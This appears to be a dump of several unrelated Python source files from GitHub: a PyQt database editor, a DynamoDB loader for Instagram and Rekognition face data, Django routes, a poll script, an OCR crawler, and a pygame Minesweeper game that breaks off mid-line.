delete_button = QPushButton(\"Delete\", self)\n delete_button.clicked.connect(self.delete_record)\n delete_button.resize(delete_button.sizeHint())\n delete_button.move(1250, 650)\n self.show()\n\n def populate_table_list(self):\n tables = [\"shows\", \"movies\", \"popularShows\", \"popularMovies\", \"ratings\"]\n for table in tables:\n self.table_list.addItem(table)\n\n # Acts as a factory for items in the list of records. Records are checked against the\n # cache of records to save load times. Then values are concatenated into a single string.\n # I use string slicing to strip off excess formatting. 
It takes up less space than using\n # logic to prevent the extra \" --- \" from being put on in the first place.\n def populate_record_list(self):\n self.record_list.clear()\n current_table = self.table_list.currentText()\n records = self.record_cache.get(current_table)\n if records is None:\n db = main.open_db(\"im.db\")\n records = main.query_entire_table(db[1], current_table)\n self.record_cache[current_table] = records\n main.close_db(db[0])\n\n for record in records:\n fields = \"\"\n for column in record.keys():\n fields += column + \": \" + str(record[column]) + \" --- \"\n QListWidgetItem(fields[:-5], self.record_list)\n\n def update_record(self):\n if self.record_list.currentItem() is not None:\n update_form = UpdateDialog.UpdateDialog(self.convert_record_to_dict())\n update_form.exec()\n updated_record = update_form.record_data\n\n db = main.open_db(\"im.db\")\n main.update_record(db[1], self.table_list.currentText(), updated_record)\n main.close_db(db[0])\n\n def delete_record(self):\n db = main.open_db(\"im.db\")\n current_record = self.record_list.currentItem()\n\n # Records are in the list as a single string. This line uses some string manipulation to isolate the id\n record_id = current_record.text().split(\" --- \")[0]\n\n main.delete_record(db[1], self.table_list.currentText, record_id)\n main.close_db(db[0])\n\n # Method assumes text is being taken directly from the QListWidget when formatting\n def convert_record_to_dict(self) -> dict:\n current_record = self.record_list.currentItem().text()\n formatted_record = {}\n record_text = current_record.split(\" --- \")\n for field in record_text:\n pair = field.split(\": \")\n formatted_record[pair[0]] = pair[1]\n return formatted_record\n","repo_name":"SouzaNicholas/NSouzaIMDBProject","sub_path":"UpdateWindow.py","file_name":"UpdateWindow.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70765288762","text":"#!/usr/bin/env python3\n\nimport sys\nimport boto3\nimport json\n\n\ndef main(argv):\n\tif len(argv) < 3:\n\t\tprint(\"Error: usage \" + argv[0] + \" <looter json path> <rekognition json path>\")\n\t\treturn\n\n\tawsAccessKeyId = input(\"AWS Access Key ID: \")\n\tawsAccessKeySecret = input(\"AWS Access Key Secret: \")\n\n\tdynamodb_client = boto3.client(\n\t\tservice_name=\"dynamodb\",\n\t\tregion_name=\"eu-west-1\",\n\t\taws_access_key_id = awsAccessKeyId,\n\t\taws_secret_access_key = awsAccessKeySecret\n\t)\n\n\ttables = dynamodb_client.list_tables()\n\tif not tables or not tables[\"TableNames\"] or \\\n\t\t\t(\"looter\" not in tables[\"TableNames\"]) or \\\n\t\t\t(\"rekognition\" not in tables[\"TableNames\"]):\n\t\tprint(\"Error: tables doesn't exist\")\n\t\treturn\n\n\tid = \"\"\n\twith open(argv[1]) as looterJsonFile:\n\t\tlooterJsonContent = json.loads(looterJsonFile.read())\n\n\t\tid = looterJsonContent[\"id\"]\n\n\t\tresponse = dynamodb_client.put_item(\n\t\t\tTableName='looter',\n\t\t\tItem={\n\t\t\t\t\"id\" : { 'S': id },\n\t\t\t\t\"timestamp\" : { 'S': str(looterJsonContent[\"taken_at_timestamp\"]) },\n\t\t\t\t\"url\" : { 'S': looterJsonContent[\"display_url\"] },\n\t\t\t\t\"description\" : { 'S': looterJsonContent[\"edge_media_to_caption\"][\"edges\"][0][\"node\"][\"text\"] },\n\t\t\t\t\"likesCount\" : { 'N': str(looterJsonContent[\"edge_liked_by\"][\"count\"]) },\n\t\t\t\t\"commentsCount\" : { 'N': str(looterJsonContent[\"edge_media_to_comment\"][\"count\"]) 
}\n\t\t\t}\n\t\t)\n\n\t\tprint(\"response:\")\n\t\tprint(response)\n\n\twith open(argv[2]) as rekJsonFile:\n\t\trekJsonContent = json.loads(rekJsonFile.read())\n\n\t\tfor iFaceDetails in range(len(rekJsonContent[\"FaceDetails\"])):\n\t\t\tfaceDetails = rekJsonContent[\"FaceDetails\"][iFaceDetails]\n\n\t\t\temotions = { x[\"Type\"] : x[\"Confidence\"] for x in faceDetails[\"Emotions\"] }\n\n\t\t\tresponse = dynamodb_client.put_item(\n\t\t\t\tTableName='rekognition',\n\t\t\t\tItem={\n\t\t\t\t\t\"id\" : { 'S': id },\n\t\t\t\t\t\"faceIndex\" : { 'N': str(iFaceDetails) },\n\t\t\t\t\t\"confidence\" : { 'N' : str(faceDetails[\"Confidence\"]) },\n\t\t\t\t\t\"ageLow\" : { 'N' : str(faceDetails[\"AgeRange\"][\"Low\"]) },\n\t\t\t\t\t\"ageHigh\" : { 'N' : str(faceDetails[\"AgeRange\"][\"High\"]) },\n\t\t\t\t\t\"gender\" : { 'S' : faceDetails[\"Gender\"][\"Value\"] },\n\t\t\t\t\t\"eyeglasses\" : { 'BOOL' : faceDetails[\"Eyeglasses\"][\"Value\"] == True },\n\t\t\t\t\t\"sunglasses\" : { 'BOOL' : faceDetails[\"Sunglasses\"][\"Value\"] == True },\n\t\t\t\t\t\"beard\" : { 'BOOL' : faceDetails[\"Beard\"][\"Value\"] == True },\n\t\t\t\t\t\"moustache\" : { 'BOOL' : faceDetails[\"Mustache\"][\"Value\"] == True },\n\t\t\t\t\t\"happyConfidence\" : { 'N' : str(emotions[\"HAPPY\"]) },\n\t\t\t\t\t\"surprisedConfidence\" : { 'N' : str(emotions[\"SURPRISED\"]) },\n\t\t\t\t\t\"fearConfidence\" : { 'N' : str(emotions[\"FEAR\"]) },\n\t\t\t\t\t\"sadConfidence\" : { 'N' : str(emotions[\"SAD\"]) },\n\t\t\t\t\t\"angryConfidence\" : { 'N' : str(emotions[\"ANGRY\"]) },\n\t\t\t\t\t\"disgustedConfidence\" : { 'N' : str(emotions[\"DISGUSTED\"]) },\n\t\t\t\t\t\"confusedConfidence\" : { 'N' : str(emotions[\"CONFUSED\"]) },\n\t\t\t\t\t\"calmConfidence\" : { 'N' : str(emotions[\"CALM\"]) }\n\t\t\t\t}\n\t\t\t)\n\n\t\t\tprint(\"response:\")\n\t\t\tprint(response)\n\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)\n","repo_name":"Zalez95/TFM","sub_path":"scripts/tests/aws/dynamodbtest.py","file_name":"dynamodbtest.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41093912356","text":"# from django.conf.urls import url\nfrom django.urls import path\nfrom OfflinePlaylist import views\n\napp_name = 'OfflinePlaylist'\n\nurlpatterns = [\n path('', views.index, name=\"index\"),\n path('playlist/', views.playlists, name='playlists'),\n path('test/', views.test, name='test'),\n path('GetPlaylists/', views.get_playlist, name='GetPlaylists'),\n path('song/<int:pk>', views.song_view, name='curr_song')\n]","repo_name":"sandipan-basak/Offline_Music_Palyer","sub_path":"OfflinePlaylist/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38693100887","text":"file_name = 'reasons.txt'\n\nreasons = []\nwhile True:\n answers = input(\"Why do you like programming?: \")\n reasons.append(answers)\n\n continue_poll = input(\"Would do like to continue the poll?:(y/n) \")\n if continue_poll == 'n':\n break\n\nwith open(file_name, 'a') as file_object:\n for reason in reasons:\n file_object.write(f\"{reason}\\n\")","repo_name":"YolbarsZiya1997/Python_Projects","sub_path":"files&exceptions/elegent_gp.py","file_name":"elegent_gp.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73343735173","text":"from PIL import Image\nimport 
bs4\nimport os\nimport pytesseract\nimport sys\n\nconfig = ('--psm 4 -c tessedit_create_hocr=1')\n\n# https://blog.naver.com/momsfood_ 맘스푸드 블로그 주소\n\ndef main(argv):\n for filename in os.listdir(\".\"):\n if str(filename) not in ['.','..']:\n nameParts = str(filename).split(\".\")\n if nameParts[-1].lower() in [\"gif\", \"png\", \"jpg\", \"jpeg\"]:\n try:\n # print(\"Found file \" + str(filename))\n # ocrText = pytesseract.image_to_string(str(filename), timeout=5, config=config)\n # print (ocrText)\n # print(\"\")\n pytesseract.pytesseract.run_tesseract(str(filename), str(filename+\"_parsed\"), extension='png', lang = 'kor', config=config)\n xml_input = open(str(filename+\"_parsed.hocr\"), \"r\", encoding=\"utf-8\")\n soup = bs4.BeautifulSoup(xml_input, 'lxml')\n\n ocr_lines = soup.findAll(\"span\", {\"class\": \"ocr_line\"})\n\n lines_structure = []\n for line in ocr_lines:\n line_text = line.text.replace(\"\\n\", \" \").strip()\n title = line['title']\n x1, y1, x2, y2 = map (int, title[5:title.find(\";\")].split())\n lines_structure.append({\"x1\":x1, \"y1\": y1, \"x2\": x2, \"y2\": y2, \"text\":line_text})\n except Exception as err:\n print(\"error occured\" + str(err))\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"RedForest0607/momsfood-crawling","sub_path":"momsfood-crawler.py","file_name":"momsfood-crawler.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5797064015","text":"\"\"\"\r\nTODO:\r\n\r\nOptimizations (if needed)\r\n\"\"\"\r\n\r\n\r\nfrom write import write\r\n\r\nimport os\r\nimport sys\r\n\r\nimport numpy as np\r\nimport random\r\n\r\nimport time\r\n\r\nimport pygame\r\n\r\nsys.setrecursionlimit(26194)\r\n\r\npyg = pygame\r\ndisp = pygame.display\r\n\r\npyg.init()\r\ndisp.init()\r\n\r\n\"\"\"Colors\"\"\"\r\nWHITE = pyg.Color('white')\r\nBLACK = pyg.Color('black')\r\nGREEN = pyg.Color('green')\r\nRED = pyg.Color('red')\r\nYELLOW = pyg.Color('yellow')\r\nLIGHTBLUE = pyg.Color('lightblue')\r\n\r\nbg_col = WHITE\r\nline_col = BLACK\r\ntext_col = BLACK\r\nbtn_col = GREEN\r\nquit_col = RED\r\noption_col = YELLOW\r\nchange_optn_col = YELLOW\r\nup_col = LIGHTBLUE\r\ndown_col = LIGHTBLUE\r\n\r\n\"\"\"Screen\"\"\"\r\n# Resolutions: 960x720, 1080x720, 1536x864\r\nscreen = disp.set_mode((1536, 864))\r\nscreen_w, screen_h = screen.get_size()\r\nscreen.fill(bg_col)\r\ndisp.flip()\r\n\r\ndisp.set_caption('Minesweeper')\r\n\r\n\r\n\"\"\"Images\"\"\"\r\n\r\n\r\ndef load_img(name, conv_alpha=False):\r\n \"\"\"Loads image\"\"\"\r\n image_name = os.path.join('img', 'Minesweeper', name)\r\n image = pyg.image.load(image_name)\r\n if conv_alpha:\r\n image = image.convert_alpha()\r\n else:\r\n image = image.convert()\r\n image_rect = image.get_rect()\r\n return image, image_rect\r\ntile_1, tile_1_rect = load_img('1.bmp') # 1 tile\r\ntile_2, tile_2_rect = load_img('2.bmp') # 2 tile\r\ntile_3, tile_3_rect = load_img('3.bmp') # 3 tile\r\ntile_4, tile_4_rect = load_img('4.bmp') # 4 tile\r\ntile_5, tile_5_rect = load_img('5.bmp') # 5 tile\r\ntile_6, tile_6_rect = load_img('6.bmp') # 6 tile\r\ntile_7, tile_7_rect = load_img('7.bmp') # 7 tile\r\ntile_8, tile_8_rect = load_img('8.bmp') # 8 tile\r\ntile_blank, tile_blank_rect = load_img('Empty.bmp') # Indented blank tile\r\ntile_mark, tile_mark_rect = load_img('Mark.bmp') # Marker tile\r\ntile_mark_through, tile_mark_through_rect = load_img('Mark_Through.bmp')\r\ntile_mine, tile_mine_rect = load_img('Mine.bmp') # Mine 
tile\r\ntile_blank_up, tile_blank_up_rect = load_img('Empty_Up.bmp') # Blank tile\r\ntile_blank_up_through, tile_blank_up_through_rect =\\\r\n load_img('Empty_Up_Through.bmp')\r\ntile_blank_up_through2, tile_blank_up_through_rect2 =\\\r\n load_img('Empty_Up_Through.bmp')\r\ntile_mark_through2, tile_mark_through_rect2 = load_img('Mark_Through.bmp')\r\ntile_cpumark, tile_cpumark_rect = load_img('CpuMark.bmp')\r\ntile_dot, tile_dot_rect = load_img('Dot.png', conv_alpha=True)\r\n\r\n\"\"\"Grid size\"\"\"\r\nsize_w = 30\r\nsize_h = 30\r\n\"\"\"Mine count\"\"\"\r\nmines = 125\r\n\r\n\"\"\"Options\"\"\"\r\nshow_destroy = False\r\ncpu = False\r\nwait = 1\r\nmode = 1\r\nvis_helper = True\r\nshow_time = True\r\n\"\"\"\r\nModes:\r\n1: Normal 5: Diagonal\r\n XXX X-X\r\n XOX -O-\r\n XXX X-X\r\n2: Knight's path 6: Far diagonal\r\n -X-X- X---X\r\n X---X -X-X-\r\n --O-- --O--\r\n X---X -X-X-\r\n -X-X- X---X\r\n3: Orthogonal\r\n -X-\r\n XOX\r\n -X-\r\n4: Far orthogonal\r\n --X--\r\n --X--\r\n XXOXX\r\n --X--\r\n --X--\r\n\"\"\"\r\naround = []\r\nmodes_str = {1: 'Normal',\r\n 2: \"Knight's Path\",\r\n 3: 'Orthogonal',\r\n 4: 'Far Orthogonal',\r\n 5: 'Diagonal',\r\n 6: 'Far Diagonal'}\r\n\r\n\"\"\"Functions\"\"\"\r\n\r\n\r\ndef update():\r\n disp.flip()\r\n pyg.event.pump()\r\n\r\n\r\ndef clear():\r\n screen.fill(bg_col)\r\n\r\n\r\ndef ind_rel(x_d, y_d): # Get the relative index (with diff x_d and y_d)\r\n return index+(x_d)+(y_d*size_w) # Return index\r\n\r\n\r\ndef count_mines(x, y):\r\n c = 0\r\n for dx, dy in around:\r\n if x+dx >= size_h or y+dy >= size_w or x+dx < 0 or y+dy < 0:\r\n continue\r\n elif tiles[x+dx, y+dy] == 9:\r\n c += 1\r\n return c\r\n\r\n\r\ndef set_mode():\r\n global around\r\n if mode == 1: # Normal\r\n around = ((-1, -1), ( 0, -1), ( 1, -1),\r\n (-1, 0), ( 1, 0),\r\n (-1, 1), ( 0, 1), ( 1, 1))\r\n elif mode == 2: # Knight's path\r\n around = ( (-1, -2), ( 1, -2),\r\n (-2, -1), ( 2, -1),\r\n (-2, 1), ( 2, 1),\r\n (-1, 2), ( 1, 2))\r\n elif mode == 3: # Orthogonal\r\n around = ( (0, -1),\r\n (-1, 0), ( 1, 0),\r\n (0, 1))\r\n elif mode == 4: # Far Orthogonal\r\n around = ( (0, -2),\r\n (0, -1),\r\n (-2, 0), (-1, 0), ( 1, 0), ( 2, 0),\r\n (0, 1),\r\n (0, 2))\r\n elif mode == 5: # Diagonal\r\n around = ((-1, -1), (1, -1),\r\n (-1, 1), (1, 1))\r\n elif mode == 6: # Far Diagonal\r\n around = ((-2, -2), (2, -2),\r\n (-1, -1), (1, -1),\r\n (-1, 1), (1, 1),\r\n (-2, 2), (2, 2))\r\n\r\nset_mode() # Sets around variable according to mode\r\n\r\n\r\ndef delaround(i, j):\r\n \"\"\"Reveal tiles around a clicked tile\"\"\"\r\n global game_over, last_destroy\r\n # If the clicked tile is already revealed, do nothing.\r\n if tiles_cover[i, j].get_size() == (0, 0):\r\n return\r\n if tiles_cover[i, j] == tile_img_list[11]:\r\n return\r\n if tiles_cover[i, j] != tile_img_list[11]:\r\n tiles_cover[i, j] = pyg.Surface((0, 0)) # Reveal clicked tile\r\n last_destroy = (i, j)\r\n if tiles[i, j] == 9: # If mine is under clicked tile\r\n game_over = 1\r\n # If the current tile is blank, check all adjacent tiles\r\n cycle = [(i+dx, j+dy) for dx, dy in around]\r\n # Cycles through surrounding tiles\r\n for x, y in cycle:\r\n if show_destroy:\r\n pyg.event.pump()\r\n # If x or y coordinates are off the grid, skip this loop\r\n if x >= size_h or y >= size_w or x < 0 or y < 0:\r\n continue\r\n # If the current tile is already uncovered, skip loop\r\n if tiles_cover[x, y].get_size() == (0, 0):\r\n continue\r\n if tiles_cover[x, y] == tile_img_list[11]:\r\n continue\r\n # If clicked tile is a number tile, uncover 
it\r\n if tiles[i, j] == 0 and tiles[x, y] in range(1, 9):\r\n tiles_cover[x, y] = pyg.Surface((0, 0))\r\n last_destroy = (i, j)\r\n if show_destroy:\r\n draw_img()\r\n draw_cover()\r\n update()\r\n # If clicked tile is blank, call function at the tile\r\n elif tiles[x, y] == 0: # abs(x-i)+abs(y-j) != 2\r\n if show_destroy:\r\n draw_img()\r\n draw_cover()\r\n update()\r\n delaround(x, y)\r\n\r\n\r\ndef draw_all():\r\n clear()\r\n draw_img()\r\n draw_cover()\r\n draw_time()\r\n draw_mines_left()\r\n update()\r\n\r\n\r\ndef draw_cover():\r\n dest_x = screen_w//2 - (size_w*tile_w)//2\r\n dest_y = screen_h//2 - (size_h*tile_h)//2\r\n\r\n for y in tiles_cover:\r\n for x in y:\r\n screen.blit(x, (dest_x, dest_y))\r\n dest_x += tile_w\r\n dest_y += tile_h\r\n dest_x = screen_w//2 - (size_w*tile_w)//2\r\n\r\n\r\ndef draw_img():\r\n dest_x = screen_w//2 - (size_w*tile_w)//2\r\n dest_y = screen_h//2 - (size_h*tile_h)//2\r\n\r\n for y in tiles_img:\r\n for x in y:\r\n screen.blit(x, (dest_x, dest_y))\r\n dest_x += tile_w\r\n dest_y += tile_h\r\n dest_x = screen_w//2 - (size_w*tile_w)//2\r\n\r\n\r\ndef draw_time():\r\n if time_start:\r\n cur_time = time.time()-time_start\r\n write(screen,\r\n 'Time: ' + str(int(cur_time)//60) + ':' +\r\n str(int(cur_time) % 60).zfill(2) + '.' +\r\n str(round(cur_time-int(cur_time), 2))[2:],\r\n text_col, None, 28, screen_w//2-60, screen_h-50,\r\n centered=False)\r\n\r\n\r\ndef draw_mines_left():\r\n write(screen, 'Mines Left: '+str(mines_left),\r\n text_col, None, 28, screen_w//2, 50)\r\n\r\n\r\n\"\"\"Mark Tile\"\"\"\r\n\r\n\r\ndef mark(i, j):\r\n global mines_left\r\n if tiles_cover[i, j] == tile_img_list[11]:\r\n tiles_cover[i, j] = tile_img_list[10]\r\n mines_left += 1\r\n elif tiles_cover[i, j] == tile_img_list[10]:\r\n tiles_cover[i, j] = tile_img_list[11]\r\n mines_left -= 1\r\n\r\n\r\ndef clear_tiles(i, j):\r\n cycle = [(i+dx, j+dy) for dx, dy in around]\r\n if tiles_img[i, j] in tile_img_list[1:9]:\r\n count = 0\r\n for x, y in cycle:\r\n if x < 0 or y < 0 or x >= size_h or y >= size_w:\r\n continue\r\n if tiles_cover[x, y] == tile_img_list[11]:\r\n count += 1\r\n if count == tiles[i, j]:\r\n for x, y in cycle:\r\n if x < 0 or y < 0 or x >= size_h or y >= size_w:\r\n continue\r\n delaround(x, y)\r\n\r\n\r\ndef show_mines():\r\n for x, y in mine_indices:\r\n if tiles_cover[x, y] == tile_img_list[10]:\r\n tiles_cover[x, y] = tile_img_list[12]\r\n elif tiles_cover[x, y] == tile_img_list[11]:\r\n tiles_cover[x, y] = tile_img_list[13]\r\n\r\n for a in range(255, 100, -1):\r\n tile_img_list[12].set_alpha(a)\r\n tile_img_list[13].set_alpha(a)\r\n\r\n draw_img()\r\n draw_cover()\r\n\r\n update()\r\n pyg.event.pump()\r\n pyg.time.delay(20)\r\n\r\n\r\ndef explode_mines():\r\n b = False\r\n index_coords = last_destroy\r\n tile_img_list[14].set_alpha(100)\r\n tile_img_list[15].set_alpha(100)\r\n mine_distance = []\r\n for x, y in mine_indices:\r\n mine_distance.append(\r\n (\r\n ((index_coords[0]-x)**2 + (index_coords[1]-y)**2)**0.5,\r\n mine_indices.index((x, y)))\r\n )\r\n\r\n mine_distance.sort()\r\n\r\n for dist, mine_index in mine_distance:\r\n x, y = mine_indices[mine_index]\r\n cur_tile_img = tiles_cover[x, y]\r\n if tiles_cover[x, y] == tile_img_list[10]:\r\n tiles_cover[x, y] = tile_img_list[12]\r\n elif tiles_cover[x, y] == tile_img_list[11]:\r\n tiles_cover[x, y] = tile_img_list[13]\r\n for a in range(255, 100, -15):\r\n tile_img_list[12].set_alpha(a)\r\n tile_img_list[13].set_alpha(a)\r\n\r\n draw_img()\r\n draw_cover()\r\n\r\n update()\r\n event = 
pyg.event.get()\r\n if event:\r\n event = event[0]\r\n else:\r\n event = pyg.event.Event(-1)\r\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 2 and event.dict['key'] == 27:\r\n for x, y in mine_indices:\r\n if tiles_cover[x, y] == tile_img_list[10] or\\\r\n tiles_cover[x, y] == tile_img_list[12]:\r\n tiles_cover[x, y] = tile_img_list[14]\r\n elif tiles_cover[x, y] == tile_img_list[11] or\\\r\n tiles_cover[x, y] == tile_img_list[13]:\r\n tiles_cover[x, y] = tile_img_list[15]\r\n draw_img()\r\n draw_cover()\r\n update()\r\n b = True\r\n break\r\n if b:\r\n break\r\n\r\n if tiles_cover[x, y] == tile_img_list[12]:\r\n tiles_cover[x, y] = tile_img_list[14]\r\n elif tiles_cover[x, y] == tile_img_list[13]:\r\n tiles_cover[x, y] = tile_img_list[15]\r\n\r\n\r\ndef show_all():\r\n for a in range(255, 200, -1):\r\n tile_img_list[10].set_alpha(a)\r\n tile_img_list[11].set_alpha(a)\r\n draw_img()\r\n draw_cover()\r\n update()\r\n pyg.event.pump()\r\n pyg.time.delay(20)\r\n\r\n\r\ndef resize_tiles():\r\n global tile_h, tile_w, tile_ratio, tile_img_list, tile_rect_list\r\n global tile_1, tile_1_rect, tile_2, tile_2_rect,\\\r\n tile_3, tile_3_rect, tile_4, tile_4_rect,\\\r\n tile_5, tile_5_rect, tile_6, tile_6_rect,\\\r\n tile_7, tile_7_rect, tile_8, tile_8_rect,\\\r\n tile_blank, tile_blank_rect, tile_mark, tile_mark_rect,\\\r\n tile_mark_through, tile_mark_through_rect,\\\r\n tile_mark_through2, tile_mark_through_rect2,\\\r\n tile_mine, tile_mine_rect, tile_blank_up, tile_blank_up_rect,\\\r\n tile_blank_up_through, tile_blank_up_through_rect,\\\r\n tile_blank_up_through2, tile_blank_up_through_rect2,\\\r\n tile_cpumark, tile_cpumark_rect, tile_dot, tile_dot_rect\r\n\r\n tile_img_list = [\r\n tile_blank, tile_1, tile_2, tile_3, tile_4, tile_5,\r\n tile_6, tile_7, tile_8, tile_mine,\r\n tile_blank_up, tile_mark, tile_blank_up_through, tile_mark_through,\r\n tile_blank_up_through2, tile_mark_through2, tile_cpumark, tile_dot\r\n ] # List of tile images\r\n\r\n for i in [x for x in tile_img_list if x != tile_dot]:\r\n i.set_alpha(255)\r\n tile_dot.set_alpha(64)\r\n\r\n tile_h = (screen_h-150)//size_h # Tile height (resized)\r\n tile_w = tile_h # Tile width is equal to the tile height (resized)\r\n if tile_w*size_w >= screen_w-500:\r\n tile_w = (screen_w-500)//size_w\r\n tile_h = tile_w\r\n\r\n tile_ratio = 50/tile_h # Tile ratio\r\n\r\n tile_img_list = [\r\n pyg.transform.scale(img, (tile_h, tile_w)) for img in tile_img_list\r\n ] # Scaled images for tile images\r\n tile_rect_list = [\r\n img.get_rect() for img in tile_img_list\r\n ] # Scaled image rects for tile images\r\n\r\n (tile_blank_rect,\r\n tile_1_rect, tile_2_rect, tile_3_rect, tile_4_rect,\r\n tile_5_rect, tile_6_rect, tile_7_rect, tile_8_rect,\r\n tile_mine_rect,\r\n tile_blank_up_rect,\r\n tile_mark_rect,\r\n tile_blank_up_through_rect,\r\n tile_mark_through_rect,\r\n tile_blank_up_through_rect2,\r\n tile_mark_through_rect2,\r\n tile_cpumark_rect,\r\n tile_dot_rect\r\n ) = tile_rect_list # Set rect variables\r\n\r\n (tile_blank,\r\n tile_1, tile_2, tile_3, tile_4,\r\n tile_5, tile_6, tile_7, tile_8,\r\n tile_mine,\r\n tile_blank_up,\r\n tile_mark,\r\n tile_blank_up_through,\r\n tile_mark_through,\r\n tile_blank_up_through2,\r\n tile_mark_through2,\r\n tile_cpumark,\r\n tile_dot\r\n ) = tile_img_list # Set image variables\r\n\r\n\r\ndef main():\r\n global record_time, cur_time, time_start, end_time,\\\r\n index, game_over, mines_left, mine_indices,\\\r\n index_coords\r\n global tile_1, tile_1_rect, tile_2, tile_2_rect,\\\r\n 
tile_3, tile_3_rect, tile_4, tile_4_rect,\\\r\n tile_5, tile_5_rect, tile_6, tile_6_rect,\\\r\n tile_7, tile_7_rect, tile_8, tile_8_rect,\\\r\n tile_blank, tile_blank_rect, tile_mark, tile_mark_rect,\\\r\n tile_mark_through, tile_mark_through_rect,\\\r\n tile_mine, tile_mine_rect, tile_blank_up, tile_blank_up_rect,\\\r\n tile_blank_up_through, tile_blank_up_through_rect,\\\r\n tile_dot, tile_dot_rect\r\n global tiles, tiles_img, tile_img_list,\\\r\n tile_h, tile_w, tile_rect_list, tiles_cover\r\n\r\n game_over = 0\r\n cur_time = None\r\n time_start = None\r\n end_time = 2**1000\r\n set_mode()\r\n\r\n mines_left = int(mines)\r\n\r\n \"\"\"Variables/Tiles\"\"\"\r\n\r\n tiles = np.array([[0]*size_w]*size_h) # Tiles (numbers)\r\n\r\n tile_img_list = [\r\n tile_blank, tile_1, tile_2, tile_3, tile_4, tile_5,\r\n tile_6, tile_7, tile_8, tile_mine,\r\n tile_blank_up, tile_mark, tile_blank_up_through, tile_mark_through,\r\n tile_blank_up_through2, tile_mark_through2\r\n ] # List of tile images\r\n\r\n resize_tiles()\r\n\r\n # Board tile images\r\n tiles_img = np.array([[tile_img_list[0]]*size_w]*size_h)\r\n # Overlay tile images\r\n tiles_cover = np.array([[tile_blank_up]*size_w]*size_h)\r\n\r\n tiles_rect = [] # Initialize tile_rect list for checking clicks\r\n\r\n i = 0 # Initialize i and j coordinates of tile list\r\n j = 0\r\n\r\n dest_x = screen_w//2 - (size_w*tile_w)//2 # Destination of tiles\r\n dest_y = screen_h//2 - (size_h*tile_h)//2 # (Centered around middle)\r\n\r\n clear()\r\n\r\n if record_time:\r\n write(screen,\r\n 'Record Time: ' + str(int(record_time)//60) + ':' +\r\n str(int(record_time) % 60).zfill(2) + '.' +\r\n str(round(record_time-int(record_time), 2))[2:].zfill(2),\r\n text_col, None, 28, 25, screen_h-50,\r\n centered=False)\r\n\r\n \"\"\"Draw tiles\"\"\"\r\n for y in tiles_cover: # Go through the tiles vertically\r\n for x in y: # Go through each tile in the lists\r\n blitrect = screen.blit(x, (dest_x, dest_y)) # Draw tile\r\n tiles_rect.append(blitrect) # Append tile rect for click detection\r\n dest_x += tile_w # Move the destination x-coord to the right\r\n dest_y += tile_h # Move the destination y-coord downwards\r\n dest_x = screen_w//2 - (size_w*tile_w)//2 # Reset x-coord\r\n\r\n update() # Update screen\r\n\r\n area = pyg.Surface((screen_w, 70))\r\n area.fill(WHITE)\r\n screen.blit(area, (0, 0))\r\n write(screen, 'Start by clicking a tile.',\r\n text_col, None, 28, screen_w//2, 35)\r\n update()\r\n\r\n \"\"\"Get first click\"\"\"\r\n running = True\r\n while running:\r\n event = pyg.event.get() # Get eventlist\r\n if event: # If something happens,\r\n event = event[0] # Get the event itself\r\n else: # Otherwise,\r\n event = pyg.event.Event(-1) # Set event to something else\r\n if event.type == pyg.QUIT:\r\n running = False\r\n break\r\n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and event.dict['button'] == 1: # Left click\r\n print(\"click registered\")\r\n click = pyg.Rect(event.dict['pos'], (1, 1)) # Record pos as rect\r\n index = click.collidelist(tiles_rect) # Get index of rect clicked\r\n if index == -1:\r\n continue\r\n i = index // size_h # Get y-coord of rect clicked\r\n j = index % size_w # Get x-coord of rect clicked\r\n index_coords = (i, j) # Format as ordered pair\r\n break # Exit loop\r\n if not running:\r\n pyg.quit()\r\n return\r\n\r\n \"\"\"Set up board\"\"\"\r\n \"\"\"No-mine locations\"\"\"\r\n no_mines = [\r\n ind_rel(-2, -2), ind_rel(-1, -2),\r\n ind_rel(+0, -2), ind_rel(+1, -2), ind_rel(+2, -2),\r\n ind_rel(-2, -1), 
ind_rel(-1, -1),\r\n ind_rel(+0, -1), ind_rel(+1, -1), ind_rel(+2, -1),\r\n ind_rel(-2, +0), ind_rel(-1, +0),\r\n ind_rel(+0, +0), ind_rel(+1, +0), ind_rel(+2, +0),\r\n ind_rel(-2, +1), ind_rel(-1, +1),\r\n ind_rel(+0, +1), ind_rel(+1, +1), ind_rel(+2, +1),\r\n ind_rel(-2, +2), ind_rel(-1, +2),\r\n ind_rel(+0, +2), ind_rel(+1, +2), ind_rel(+2, +2)\r\n ] # List of places where there should be no mines at first click\r\n\r\n mine_indices = [index] # Initialize mine indices\r\n while True:\r\n for i in no_mines: # Cycle through places where no mines should be\r\n if i in mine_indices: # If one of the mines is in that place,\r\n mine_indices = random.sample(\r\n range(0, size_w*size_h), mines\r\n ) # Randomize mine placement\r\n break # Exit inner loop\r\n else: # When there are no mines in the place where they shouldn't be,\r\n break # Exit loop\r\n\r\n for mine_index in range(len(mine_indices)): # Loop though each mine\r\n index = mine_indices[mine_index] # Record the index\r\n i = index // size_w # Get the y-coordinate of the index\r\n j = index % size_h # Get the x-coordinate of the index\r\n mine_indices[mine_index] = (i, j) # Format as ordered pair\r\n tiles[i, j] = 9 # Set the tile number to 9 (denotes mine)\r\n\r\n \"\"\"Number of mines surrounding a tile\"\"\"\r\n for x in range(size_h): # Loop though the vertical coordinates\r\n for y in range(size_w): # Loop through the horizontal coordinates\r\n if tiles[x, y] == 9: # If the tile is a mine,\r\n continue # Skip this loop\r\n\r\n tiles[x, y] = count_mines(x, y)\r\n\r\n # Changes tile numbers to tile images with the corresponding numbers\r\n for i in range(len(tiles)):\r\n for j in range(len(tiles[i])):\r\n tiles_img[i, j] = tile_img_list[tiles[i, j]]\r\n\r\n index_coords_marker = (-1, -1)\r\n index_coords_clear = (-1, 